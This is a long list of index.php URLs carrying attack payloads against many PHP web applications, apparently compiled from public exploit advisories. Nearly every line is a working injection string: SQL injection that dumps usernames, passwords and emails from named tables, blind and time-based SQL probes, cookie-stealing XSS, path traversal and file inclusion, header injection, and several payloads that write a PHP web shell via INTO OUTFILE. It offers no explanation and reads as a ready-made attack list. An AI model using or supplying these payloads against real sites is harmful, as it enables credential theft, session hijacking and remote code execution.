index.php?app=video-codes&action=videos&id=-1%20union%20select%201,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6%20from%20users
index.php?a=private&inbox=&d=[ID]
index.php?archive=
index.php?archive=..
index.php?archive=5&year=2008+and+1=1 TRUE
index.php?archive=5&year=2008+and+1=2 FALSE
index.php?archive=hamid
index.php?archive=[NB]&year=[bSQL]
index.php?arcyear=-1&arcmonth=-1
index.php?area=..
index.php?area=1&p=gallery&action=showimages&galid=1 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),uname,pass,email) from live_user--
index.php?area=1&p=gallery&action=showimages&galid=[SQL INj]
index.php?area=1&p='[SQL code] 
index.php?area=forum&s=forum&f=1\
index.php?arg[il]=english&arg[target]=install
index.php?arg[il]=english&arg[target]=uninstall
index.php'; # argv[1] - host
index.php?article_ID=8
index.php?article_ID=[SQL Injection]&get_action=article&section=5
index.php?artikel=-1+union+select+1,2,concat_ws(0x3a,user_type,user_name,user_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+fastpublish__forumen_userdata
index.php?artikel=2&target=.
index.php?a='><script>alert(document.cookie)<
index.php?asc=(SELECT(IF((ASCII(SUBSTRING(login,1,1))=102),LinkName,Description))FROM%20at_admins)%20DESC%20LIMIT%202
index.php?a=search&type=Any&search=1&seller=-9999+union+all+select+@@version,1--
index.ph?path=
index.php?_a=tickets&_m=viewmain&email22=blah@blah&ticketkey22=[
index.php?_a=tickets&_m=viewmain&email22=[SQL]&ticketkey22= 
index.php?auc=1
index.php?a=ulist&mode=9&order=1>'><ScRiPt %0A%0D>alert(640795682719)%3B<
index.php?a=ulist&pr=1<
index.php?autocom=awards&do=view&id=1+and+1=0 > false
index.php?autocom=awards&do=view&id=1+and+1=1 > true
index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=4
index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=5
index.php?autocom=awards&do=view&id=1[SQL INJECTION]
index.php?autocom=photohost&CODE=04&img=1+and+1=0--+ => false
index.php?autocom=photohost&CODE=04&img=1+and+1=1--+ => true
index.php?autocom=photohost&CODE=04&img=1+and+substring(version(),1,1)=5
index.php?autocom=photohost&CODE=04&img=[SQL Injection]
index.php?automodule=blog&blogid=1&cmd=aboutme&mid=2' 
index.php?automodule=blog&blogid=1&cmd=editcomment&eid=1&cid=-99%20UNION%20SELECT%201,0,0,0,0,0,0,0,0,0,0,0,0,name%20FROM%20ibf_members%20WHERE%201
index.php?automodule=blog&blogid=1&cmd=editentry&eid=99%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members%20WHERE%201
index.php?automodule=blog&blogid=1&cmd=replyentry&eid=99%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members%20WHERE%201
index.php?automodule=downloads&req=idx&cmd=viewdetail&f_id=2
index.php?automodule=gallery&cmd=sc&cat=26&sort_key=date&order_key=DESC&prune_key=30&st='[SQL] 
index.php?auto_slide=&ID=-1 [SQL]
index.php?aux_page=..
index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=4&admin=0 FALSE
index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=5&admin=0 TRUE
index.php?a=view_forum&fid=1>'><ScRiPt %0A%0D>alert(664745745195)%3B<
index.php?a=view_forum&fid=[BLIND]
index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
index.php?a=view_forum&fid=[SQL]	
index.php?_a=viewProd&productId=22+and+1=2+union+select+version()
index.php?_a=viewProd&productId=(SQL injection)
index.php?azione=cerca  
index.php?Azione=[SHELL]
index.php?basedir= [LFI]%00
index.php?base==[shell]
index.php?base=test
index.php?bgcol=[input]
index.php?bit=..
index.php?blog=admin&section=..
index.php?blogid=[sql]
index.php?blogpost=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
index.php?blogpost=DSecRG&cat=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
index.php?blog=test&section=..
index.php?board=1;action=modify2;delAttach=on;attachOld=..
index.php?board=1;action=modify2;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;posti
index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,%27-%2
index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,nul
index.php?b[username]="><script>alert(
index.php?BWSESSION=%0d%0a[http headers]
index.php?c='
index.php?c=12+and+substring(@@version,1,1)=4
index.php?c=12+and+substring(@@version,1,1)=5
index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--
index.php?c=1&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?c=1&mod=index&lang=en )
index.php?c='%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?c=%27
index.php?c_action=listings&state=%272
index.php?calbums=1'
index.php?caller=xlink&url=brand.php&brandID=1[SQL]
index.php?cam=
index.php?cat=..
index.php?cat='
index.php?cat=-1
index.php?cat=100)%09or%090=0%09or%09(0=1 
index.php?cat=10_Willkommen&page=..
index.php?cat=10_Willkommen&page[]=10_Willkommen
index.php?cat[]=10_Willkommen&page=10_Willkommen
index.php?cat=-1 [SQL]
index.php?cat1=[Sqli]
index.php?cat=-1+union+select+1,version(),3
index.php?cat=-1 union select 1,@@version,3 %23
index.php?cat=-1+union+select+concat(nomUtilisateur,char(58),passUtilisateur)+from+domphp_utilisateurs+where+id_utilisateur=[UserId]
index.php?cat=-1+union+select+current_time,2,3
index.php?cat=-1+union+select+user(),2,3
index.php?cat=-5+UNION+SELECT+admin_email,2,3+from+ovi_anuntgratis.class_settings
index.php?cat=-5+UNION+SELECT+database(),2,3
index.php?cat=-5+UNION+SELECT+user(),2,3
index.php?cat=-5+UNION+SELECT+@@version,2,3
index.php?cat=82%20and%20substring(@@version,1,1)=4 <= False
index.php?cat=82%20and%20substring(@@version,1,1)=5 <= True
index.php?cat=-89+union+select+1,2,3,concat(user_name,0x3a,user_pass),5,6,7,8,9,0,1,2,3,4,5+from+itaf_user--
index.php?categorie=-1+union+select+0,1,2,database(),4,5,6
index.php?categorie=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6+from+blog_utilisateurs
index.php?categorie=[SQL]
index.php?category=1%20or%201=2
index.php?category=1%27%20and%201%20div%200%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29,3,4,5,6,7,8,9,10--+
index.php?category=-1 [SQL]
index.php?category=-1+union+select+1,version(),3
index.php?CATEGORY=2&SUB=-1
index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8
index.php?category=(home|comments|lists|habillage|info)&action=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?category=(home|comments|lists|habillage|info)&action=cP
index.php?category=(home|comments|lists|habillage|info)&action=[LFI]%00
index.php?categoryid=3&p17_sectionid=1&p17_imageid=[SQL code] 
index.php?categoryid=3&p17_sectionid=2&p17_action=insertimage (and use tamper data)
index.php?categoryid=6
index.php?categoryid=[SQL]
index.php?categoryID='[SQL inj] 
index.php?category="><script
index.php?category=secur
index.php?category=security&action=..
index.php?category=security&action=[Local
index.php?category=security&folder=..
index.php?category=security&folder=[Local
index.php?category=[SQL]
index.php?category=[SQL] 
index.php?cat_id=&#039;%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C
index.php?cat_id=&#039;[SQL]
index.php?cat_id=-1%20unION
index.php?cat_id=-13&#039;%20union%20select%20password%20from%20evots_user%20%20where%20&#039;1&#039;=&#039;1
index.php?cat_id=19' {SQL Injection}
index.php?cat_id=19+union+select+group_concat%28username,0x3a,password%29,2,3,4,5,6,7,8+from+cube305_CubeCart_admin_users--
index.php?catID=1 and 1=1
index.php?catID=1 and 1=2
index.php?cat_id=1 or 1=1
index.php?cat_id=%27
index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
index.php?catid=8+union+all+select+1,2,3,4,5,6--
index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS--
index.php?cat_id=Business&tim=%22%3E%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C
index.php?catid='cXIb8O3
index.php?catID=<font size=15 color=green>CoBRa_21<
index.php?cat_id=[SQL]
index.php?catid=[SQL]
index.php?cat=[nr] and 1=1 <= true
index.php?cat=[nr] and 1=2 <= False
index.php?cat=[nr] and substring(@@version,1,1)=4 <= false
index.php?cat=[nr] and substring(@@version,1,1)=5 <= true
index.php?cat_path=-1+union+select+concat(user(),0x2F2A2A2F,version(),0x2F2A2A2F,database())
index.php?cat=[SQL] 
index.php?cat=[Sql Injection] 
index.php?change_lang=..
index.php?change_lang=<LFI>
index.php?charset=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP
index.php?cid=-1
index.php?cid=1&#039;[SQL]
index.php?CID=1%20<something>
index.php?cID=1%20union%20select%201,2,3,4,5,6,@@version,8%23
index.php?cid=-1%20union%20select%201,2,3,concat(uid,0x3a,username,0x3a,useremail,0x3a,userpass,0x3a,aid,0x3a,password_reminder,0x3a,confirmation_code),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20from%20userinfo--
index.php?cid=-1%20union%20select%201,2,3,sesskey,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%20from%20sessions--
index.php?cid=-1%27+union+select+1,password+from+dcp5_members+where+uid=1
index.php?cid='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users
index.php?cid=-1+UNION+SELECT+1,2,3,concat_ws(0x3a3a,username,userpass,useremail),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+userinfo
index.php?cid=45[CODE]
index.php?cid=<script>alert(document.cookie)<
index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1
index.php?cid=[SQL] 
index.php?cid=[SQL Command] 
index.php?className=[EV!L]
index.php?class_name=[LFI]%00
index.php?clk=tbl&clkval=249&regs=NABU&lang_loc=1
index.php?cm=artikel&cp=show&id=-1
index.php?cmd=..
index.php?cmd=10&ty=%22%3bprint%28TheMirkin_janissaries_Pentester%29%3b%24a%3d%22
index.php?cmd=10&ty="%3bprint(TheMirkin_janissaries_Pentester)%3b%24a%3d"
index.php?cmd=4  
index.php?cmd=4&id=1
index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	
index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	 
index.php?cmd=6&recid=null
index.php?cmd=8&msgid=52
index.php?cmd=account
index.php?cmd=application&id=-1_tauth_kregister_len";
index.php&cmd=cat 
index.php?cmd=cat%20conf.php&lang=..
index.php?cmd=create
index.php?cmd=ecard&random=1
index.php?cmd=echo '<yeatr0x>';&com=${logs[$i]}%00");; 
index.php?cmd=id
index.php?cmd=ls%20-la
index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=..
index.php?cmd=$nos;$cmd;$nos;&com=$log%00");
index.php?cm=produk&cp=show&katid=-1
index.php?com=hex&Dld=59
index.php?command=
index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--
index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())--
index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--
index.php?comp=[SQLi
index.php?config_atkroot=SHELL
index.php?configfile=..
index.php?configFile=
index.php?config=imagesman (2 Upload Ev!l)
index.php?console=panel
index.php?console=panel", parametro, {'User-Agent' => useragent, 'Cookie' => @cookie.to_s })
index.php?CONST_INCLUDE_ROOT=[evil_scripts]
index.php?cont=-63 UNION ALL SELECT
index.php?contenido=>">alert(41197.1507065509)%3B
index.php?content=..
index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(58),user(),char(58),version()),char)
index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
index.php?contentId=[sql]
index.php?conteudo=<
index.php?conteudo=..
index.php?conteudo=[exploit]
index.php?conteudo=[LFI]
index.php?controller=
index.php?controller=accounts
index.php?controller=accounts&action=view&userid=5'><img class='view' 
index.php?controller=accounts&status=new
index.php?controller=admins
index.php?controller=admins&status=new
index.php?controller=categories
index.php?controller=categories&status=new
index.php?controller=expTag&action=show&title=changes&src=%27%22--%3E%3C
index.php?controller=main_general&option=main_downloads
index.php?_COOKIE[lang]=[EV!L]
index.php?cook_user=<script>alert(document.cookie)<
index.php?cPath=1
index.php?crn='SQL_INJECTION&action=show&show_products_mode=cat_click&PHPSESSID=2069dbe1646bdc46e4e78718e76e6d15 
index.php?c='><script>alert('hi');<
index.php?c='><script>alert('test');<
index.php?c=[sql]
index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
index.php?css=1&mid=100&art=1"
index.php?ct=evntcl&md=browse&mds=search&adsordtp=vote&city="><script>alert(document.cookie);<
index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show
index.php?ct=manw_repl&md=add_form&replid=11438   and 1=1 <= TRUE
index.php?ct=manw_repl&md=add_form&replid=11438   and 1=2 <= FALSE
index.php?ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
index.php?ct=manw_repl&md=add_form&replid=[BLIND]
index.php?currDir=.
index.php?currentIsExpanded=0%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?currentmod=[Lfi]
index.php?currentpath=..&currentfile=...
index.php?current_subsection=-99+union+select+0,1,2,3,4,5,6,load_file('
index.php?custom_language=turkish&user=detaliespopupcondrent&pid=1 AND 1=0 %75%6E%69%6F%6E SELECT 1,concat_ws(0x3e,user,password,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM admin--
index.php?custom_language=turkish&user=detaliespopupcondrent&pid={SQL}
index.php?cype=main&page=ranking&order='&job=500
index.php?d=28&m=[SQL] 
index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php
index.php?D=52&cmd=33&file=NewsArticles_1.0.0&view=1&category=&id=3'
index.php?D=52&cmd=33&file=NewsArticles_1.0.0&view=1&category=&id=[SQL injection]
index.php?D=54&cmd=33&file=ImageGallery_1.0.0&category=2'
index.php?D=54&cmd=33&file=ImageGallery_1.0.0&category=[SQL injection]
index.php?D=63'
index.php?date=22%20UNION%20SELECT%200,0,0,0,0,0,username,pass%20
index.php?date=22&month=3&year=2005%20UNION%20SELECT%200,0,0,0,0,0,
index.php?dbhcms_did=1&dbhcms_pid=11&dbhcms_lang=en" method="post" name="search" 
index.php?dbhcms_pid=-81&editmenu=-2+union+select+1,2,3,4,5,6,group_concat(user_login,0x3a,user_passwd),8,9,10,11,12,13,14+from+dbhcms_cms_users--
index.php?db_host=[SQL Injection]
index.php?db_id=1&cat_id=1&display=30&p=%3Cscript%3Ealert(document.cookie)%3C
index.php?DB=[LFI]
index.php?db_optimization=[SQL Injection]
index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8
index.php?db_themes_background_color_page=%
index.php?debug 
index.php?debug=<script>alert();<
index.php?default_language=[SQL Injection]
index.php?default_path=[evil_scripts]
index.php    (demo:demo)
index.php?DescOrderBy=
index.php?desc=(SELECT(IF((ASCII(SUBSTRING(password,1,1))=101),LinkName,Description))FROM%20at_admins)%20DESC%20LIMIT%202
index.php?design=..
index.php?details=..
index.php?dir=dld               # 
index.php?dir=icon%20tests
index.php?DIR_LIBS=..
index.php?dir=<script>malicious_code<
index.php?discuss=SQL
index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users
index.php?dl=32
index.php?dl=45
index.php?dlid=1 <== { SQL Injection }                                                   
index.php?d=list1&q=&kat=1&s_flaeche=
index.php?dlist=true
index.php?dlist=true&page=357
index.php?do=admin&area=newuser">
index.php?do=catalog&c=featured_scripts_!&i=fresh_email_script
index.php?do=catalog&c=remotely_hosted_scripts&i=faq_host
index.php?do=catalog&c=remotely_hosted_scripts&i=forum_host
index.php?do=catalog&c=scripts&i=domain_trader_script_w%252Fparking
index.php?do=catalog&c=scripts&i=games_site_script
index.php?do=catalog&c=scripts&i=pet_rate_pro
index.php?do=catalog&c=scripts&i=top_site_script
index.php?DOCUMENT_ROOT=
index.php?DOCUMENT_ROOT= [lfi]%00
index.php?doc=unote&id=[sql] 
index.php?do=details_posting&cat_id=5&posting_id=-1'
index.php?do=editcat&i=-99 UNION SELECT NULL,VERSION(),NULL 
index.php?do=editemot&i=-99 UNION SELECT NULL,VERSION(),NULL,NULL 
index.php?do=edit_post&id=-1' UNION ALL SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8,9 INTO OUTFILE '
index.php?domain[]
index.php?do=messages&user=blabla&box=-1' UNION ALL SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE '
index.php?do=messages&user=blabla&box=<?php echo "<pre>"; system('ls'); echo "<
index.php?do=newspost&id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3a,password)%20FROM%20nmd_user
index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
index.php?do=profile&user=blabla&box=-1' UNION ALL SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE '
index.php?do=profile&user=blabla&box=<?php echo "<pre>"; system('ls'); echo "<
index.php?do=register (To register )
index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
index.php?do=show_details&ID=29' 
index.php?do=show_details&ID=[sql] 
index.php?do=viewarticle&id=1'+and+31337-31337='0
index.php?do=viewarticle&id='.$view);
index.php?down=2
index.php?download=(file name)
index.php?download=includes
index.php?D=[SQL injection]
index.php?duplicate=1&post=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
index.php?dwnldct
index.php?ecPath='3
index.php?ecPath=[SQL Injection]
index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat%28user_id,0x3a,username,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--
index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=-1+union+select+1,2,3,4,GROUP_concat(user_id,0x3a,username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+sys_user--
index.php?edicion_id=1&categoria_id=1&origen_id=1&articulo_id=[N.A.S.T ]
index.php?edit_id=12&tema=12
index.php?edit_id=1&_p=null+union+all+select+1,2,concat_ws(0x3a,username,password),4,
index.php?edit_id=2&_p=2&type=..
index.php?edit_id=null+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,
index.php?edit_records=x&selected_record_number=x&table=Locations)
index.php?entry='
index.php?entry=%27 
index.php?entryid=[SQL]
index.php?entryPoint=HandleAjaxCall&amp;method=remove&amp;file=sugarcrm.log
index.php?entry=<script>alert(document.cookie)<
index.php?entry=<script>alert(document.cookie);<
index.php?env=-
index.php?e=page&id=[SQLi]&m=edit HTTP
index.php?epi=-1 UNION SELECT email,1,1 from users
index.php?epi=-1 UNION SELECT password,1,1 FROM users
index.php?epi=-1 UNION SELECT username,1,1 FROM users
index.php?epi=-999 UNION SELECT username,0,password 	#
index.php?error=[local file]%00
index.php?error=<script>alert(document.cookie)<
index.php?e=rss&c=%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
index.php?e=search&sq=%27%27%27%27%27&rs[setlimit]=0&rs[day]=18&rs[month]=9&rs[year]=2010%271%27&rs[day]=18&rs[month]=9&rs[year]=2011&rs[setuser]=&rs[pagsub][]=all&rs[pagtitle]=1&rs[pagdesc]=1&rs[pagtext]=1&rs[pagsort]=date&rs[pagsort2]=ASC&rs[frmsub][]=all&rs[frmtitle]=1&rs[frmtext]=1&rs[frmsort]=updated&rs[frmsort2]=ASC
index.php?e=search&sq=%5C'%5C'%5C'%5C'%5C'&rs%5Bsetlimit%5D=0&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2010&rs%5Bday%5D=18&rs%5Bmonth%5D=9&rs%5Byear%5D=2011&rs%5Bsetuser%5D=&rs%5Bpagsub%5D%5B%5D=all&rs%5Bpagtitle%5D=1&rs%5Bpagdesc%5D=1&rs%5Bpagtext%5D=1&rs%5Bpagsort%5D=date&rs%5Bpagsort2%5D=ASC&rs%5Bfrmsub%5D%5B%5D=all&rs%5Bfrmtitle%5D=1&rs%5Bfrmtext%5D=1&rs%5Bfrmsort%5D=updated'INJECTED_PARAM'INJECTED_PARAM&rs%5Bfrmsort2%5D=ASC HTTP
index.php?es_id=44[CODE]
index.php?es_id=46[CODE]
index.php?estado_id=14"><script>alert('y3nh4ck3r was here!')<
index.php?e=users&f=all&s=regdate&w=[SQLi] HTTP
index.php?event=coment&msnum=..
index.php?exact=1&sentence=1&s=%b3%27)))
index.php?exec=download&dir=
index.php?expA=1
index.php?_expresion_de_busqueda=<script>alert('y3nh4ck3r was here!')<
index.php?ext[]
index.php?f=..
index.php?f=994a86950
index.php?faction=reply&thread_id=[ID OF THE THREAD TO READ]&forum_id=[ID OF FORUM]&sid=[your sid]
index.php?f={anyfile number}"
index.php?f=ddAvVTUSs
index.php?feedback=<script>alert(document.cookie)<
index.php?f=<FONT size=7 >NassRaWi<
index.php?fid=-1[SQL]
index.php?fid=".$send);
index.php?file=
index.php?file=.
index.php?file=..
index.php?file=1
index.php?file=1&sort=1
index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
index.php?file=[Bad Code]
index.php?file=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
index.php?file=Calendar&m=[sql]&y=2006
index.php?file=Calendar&nuked_nude=index&op=show_event&eid=
index.php?file=Download&op=description&dl_id=317
index.php?file=Download&op=description&dl_id='[SQL]
index.php?file=Forum&page=viewtopic&forum_id=1' OR id LIKE '%%'&thread_id=1' AND auteur_id LIKE '%%' 
index.php?file=Forum&page=viewtopic&forum_id=[FORUM_ID]' OR id LIKE '%%' 
index.php?file=index.php
index.php?file=index.php 
index.php?file=Liens&op=phpinfo 
index.php?file=Liens&op=<script>alert('test');<
index.php?file=MTCMS-V2.rar
index.php?filename=
index.php?filename=adminlogin
index.php?filename=adminuser&a=3&adminid=[USER ID] 
index.php?file=News&op=phpinfo
index.php?file=News&op=<script>alert('test');<
index.php?file_op=[url]
index.php?file=Sections&op=article&artid='[SQL]
index.php?file=Suggest&module=Links
index.php?file=Team&op=phpinfo
index.php?file=Team&op=<script>alert('Test');<
index.php?file=test.xml
index.php?filter[]
index.php?filter=c99[SQL]
 index.php?filter= [SQL]
index.php?filter=u99[SQL]
index.php?f=jMicDawzV
index.php?fl=0&p1=1&p2=15&id=15'
index.php?fl=0&p1=1&p2=15&id=[SQL Injection]
index.php?flag=..
index.php?_FNROOTPATH=[EVIL]%00    
index.php?foo=bar%20U
index.php?foo=bar%20UNION%20SELECT%20ALL%20FROM%20WHERE
index.php?foobar%27,IF(ord(mid(USER(),1,1))%3d114,benchmark(500000,md5(1337)),1),2)
index.php?form1_ref_immo=1'SQL_CODE_HERE&form1_order_by=precio&form1_tp_propiedad=&form1_in_order=ASC&form1_tp_servicio=&form1_txt_poblacion=&form1_txt_zona=&form1_precio_min=&form1_precio_max=&form1_data=pg%3Dverimmo%2Cnm%3DSearch+Results%2Cshow%3D0%2Cfrom%3D0&form1_phpform_sent=1
index.php?form1_txt_email1=123'SQL_CODE_HERE&form1_data=pg%3Dremember%2Cnm%3DLost+your+Password%3F&form1_phpform_sent=1
index.php?forms=<marquee><font%20color=gren%20size=30>EL-KAHINA<
index.php?forumID=1[Injection query]
index.php?forumID=25[Injection query]
index.php?frameset=true" % rhost)
index.php?friends_name=[vacio]&action=friend&friend_id=[tu id]
index.php?friends_name=[vacio]&action=Unfriend&friend_id=[id_victima]
index.php?from="><
index.php?from_market=[char]
index.php?from_market=dudul
index.php?from_market=Y&pageurl=[injection URL]
index.php?from=[sql]&into=[sql]&value=1&action=calculate
index.php?front_indextitle=<
index.php?front_latestnews="><script>alert(document.cookie)<
index.php?front_searchsubmit="><script>alert(document.cookie)<
index.php?func=detail&aid=3010645&group_id=60081&atid=493003
index.php?func=detail&atid=430840&aid=1881236&group_id=41586
index.php?func=downloadRequest&option=com_virtuemart
index.php?func=logoff&loginid=1011' AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bhdresh'='bhdresh
index.php?func=medal&fname=1
index.php?func=medal&fname='1'------------------------------------
index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+from+members+where+user_type=2
index.php?func=member&user='+union+select+0,0,0,0,0,0,0,0,0,0,username,password,0,0,0,0,user_type+from+members+where+user_type=2
index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20<
index.php?function=banner_out&id=10000
index.php?function=search&searchFor=%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c
index.php?_=&f=update_intro&page=..
index.php?_=&f=update_intro&page=1%3CScRiPt%20%3Eprompt%28949136%29%3C%2fScRiPt%3E
index.php?fuseaction=gallery.viewPhotos&exhibition_id=13"
index.php?f=uTRRQnIjG
index.php?f=UyTfHCHIg
index.php?gadget=..
index.php?gadget=[a valid gadget]&action=<b>bold letter<
index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');<
index.php?gadget=Glossary&action=ViewTerm&term=<script
index.php?gallery=.
index.php?gallery=%3Cimg%20onmouseover=%22alert('hi')%22%20style=%22position:%20absolute;%20top:0px;%20left:%200px;%20width:%201000%;%20height:%201000%;%22%3E 
index.php?gallery=[gallery name]&image=<script>alert("lol")<script>
index.php?game=40664&cid=-1+union+select+1,2,3,name,5,6,pass,8,9,10+from+members--
index.php?Gazelle%20CMS
index.php?gbAction=add .
index.php?GEDCOM="><iframe>
index.php?gen=                                         		 #
index.php[GET][id=-1][CURRENT_USER()
index.php[GET][id=-1][MID((VERSION()),1,6)
index.php[GET][id=-1][SELECT(CASE
index.php?get=[LFI]
index.php?getSiteIndex=..
index.php?get[status]=[EV!L]
index.php?gfwww=[Shell]
index.php?g_include=[shell_script]
index.php ) ( giris yap )
index.php?GLOBALS[config][dir][classes]=[AvriLhea]
index.php?GLOBALS[config][dir][plugins]=[AvriLhea]     
index.php?GLOBALS[developer_email]=1&GLOBALS[database_module]=..
index.php?GLOBALS[g_campsiteDir]=[SHELL]
index.php?GLOBALS[langpref]=1
index.php?GLOBALS[sugarEntry]=1&theme=..
index.php?go=admin&do=do_search&du=usergroup&title=[code]&search=single 
index.php?go=dl&type=d&id=4
index.php?go=Downloads
index.php?go=Fiction&category=<id>\n";
index.php?go=Fiction&category=<valide_id>
index.php?go=listings&listing_id=-1
index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(id,0x3a,username,0x3a,password,0x3a,email),0,1,2,3,4,5,6,7,8,9,0,1%20from%20realtors--
index.php?go=listings&listing_id=-30%20union%20select%201,2,3,4,5,6,7,8,concat(username,0x3a,password),0,1,2,3,4,5,6,7,8,9,0,1%20from%20users--
index.php?go=opt
index.php?go=opt" size="120" type="text"><br>
index.php?go=singer&id=-13
index.php?group=..
index.php?group='"<
index.php?group=[Blind SQLI]&page=categories
index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users
index.php?hal=-99999'
index.php?hal=[SQL Injection]
index.php?hash=69401ac90262f3855c23cd143d7d2ae0
index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
index.php?hazel=downloads
index.php?hdoc=index%22%3E%3Cscript%3Ealert(document.cookie)%3C
index.php?help_file=..
index.php?historyyear=2008&historymonth=-1
index.php?historyyear=2009&historymonth=02 and 1=1 <= TRUE
index.php?historyyear=2009&historymonth=02 and 1=2 <= FALSE
index.php?historyyear=2009&historymonth=[BLIND]
index.php?hitdetails=..
index.php?h=ls -la
index.php<HTML>
index.php HTTP
index.php?hub_dir=
index.php?hub_dir=\\192.168.1.3\c\
index.php?hyphen[]
index.php?id=
index.php?id=..
index.php?id=0'
index.php?id=0%20or%201=2
index.php?id=&#039;[SQL]
index.php?id=1
index.php?ID=> <10>  |  *
index.php?id=-111111111+union+select+concat
index.php?id=116'
